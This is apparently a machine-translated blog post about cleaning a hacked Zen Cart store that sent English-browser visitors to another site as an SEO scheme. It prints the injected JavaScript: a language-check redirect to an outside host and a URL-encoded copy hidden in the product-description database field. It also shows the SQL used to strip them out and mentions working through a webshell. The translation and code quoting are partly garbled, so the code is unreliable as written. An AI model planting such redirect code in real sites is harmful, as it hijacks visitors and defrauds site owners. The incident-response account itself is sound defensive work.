Mark a website hacked

Preface:Yesterday, I was commissioned by a friend to solve the problem that the website automatically jumps to another website in an English browser.

Background:In the Internet era, hackers and businesses coexist. Some people use intrusion technology to achieve benefits and become a black industry chain in the network. Someone intruded into Trojans and caught bots. Some people use the intrusion chain to optimize SEO. Haha, a variety of things. The problem we encountered today is related to SEO optimization. We use others' websites to browse users and send them to the specified website. The client's website is a Foreign Trade English site, mainly selling some goods to foreigners. The websites that are redirected to the same website are in the same industry. Haha! Some understand, this is a method of SEO.

The event playback ends and the question is started.

From the Symptom Analysis, "when an English browser jumps automatically", it is displayed that it is a problem with website code, and the possibility of domain name hijacking is queued. The website uses the Zen Cart program. First, I declare that my brother is not familiar with this thing! However, there are some parsing ideas. on the homepage, check whether the website homepage contains suspicious JS Code. It is very important to judge that the browser code is implemented by JS Code.

Open the home page of the website and view the source file in the browser. First, search for the keyword of the URL to jump to. No result is found in 7louisvuitton.com. Next, you can only read the code in one line. Pay attention to the js Code. No suspicious code was found after reading the code for half a day from start to end. This seems a little difficult. Go to the background and use the Zen Cart source code search function to search for keywords. After execution, the files are still not found.

At this time, the FTP user password information is taken and the php webshell is put on the knife. You can use the file search function to search for all Keywords of a website file. It seems that this item either exists in the database or changes the url address. When using the zen cart Template under Baidu, the key parts are searched manually and no results are found.

At this time, I went to the product page on the website page and looked at it carefully. I will comment it here. <! -- Bof Product description --> found a piece of encoded js.

 

I feel that there are some problems. I will immediately look at the url decoder.

 


Two pieces of code are found:

 
 

  
  
<script language="javascript" src="http://count40.51yes.com/click.aspx?
  
  
id=401446169&logo=6" charset="gb2312"></script> 
 
 

This is traffic statistics

 
 

  
  
<script language="JavaScript">   
  
  
<!--   
  
  
var la=navigator.browserLanguage.toLowerCase();  
  
  
if(la==en-us) document.location = http://ii3v.com/b;  
  
  
// -->   
  
  
</script> 
  
  
 
 
 

This is the key. If the browser version is en-us, it will jump... Haha, very sharp.

The URL to jump to is the same website as the keyword.

The code below is a good description. The product should be a template issue. Find the template immediately.
Templatesemplate_defaultemplatespl_document_product_info_display.php

 

The content is just a variable <? Php echo stripslashes ($ products_description);?>, Depressed. I have never played Zen Cart. I don't know where the variable comes from. I had no clue after searching for a long time, so I had to go to the database to check it out. Using the php webshell backup function to connect to the database, you can see that there is a table named products_description in the database, and the backup is downloaded immediately.

Restoring local mysql

Related commands

 
 

  
  
mysql -uroot -p123456  
  
  
 
  
  
create database aaa;  
  
  
 
  
  
use aaa;  
  
  
 
  
  
source d:1.sql;  
  
  
 
 
 

After recovery
The Code was inserted before the product description table.

 
Use batch replacement, and immediately restore to normal.

The Code is as follows:

Update products_description set products_description = replace (products_description, <div style = "display: none"> <script language = "javascript" src = "http: // % 63% 6F % 75% 6E % 74% 34% 30% 2E % 35% 31% 79% 65% 73% 2E % 63% 6F % 6D/click. aspx? Id = 401446169 & logo = 6 "charset =" gb2312 "> </script> <! -- Document. write (unescape ("% 3 Cscript % 20 language % 3D % 22 JavaScript % 22% 3E % 20% 0D % 0A % 3C % 21 -- % 20% 0D % 0 Avar % 20la % 3Dnavigator. browserLanguage. toLowerCase % 28% 29% 3B % 0D % 0Aif % 28la % 3D % 3D % 27en-us % 27% 29% 20document. location % 20% 3D % 20% 27 http % 3A // % 69% 69% 33% 2E % 76% 6F % 6D/B % 63% 3B % 0D % 0A // % 20 -- % 3E % 20% 0D % 0A % 3C/script % 3E ")); // --> </script> </div> ,)

 

The following task is to find the php Trojan and backdoor and upgrade Zen Cart to the latest version.

Now the task has been completed, which is a sharp SEO attack method.

 

Author: passthrough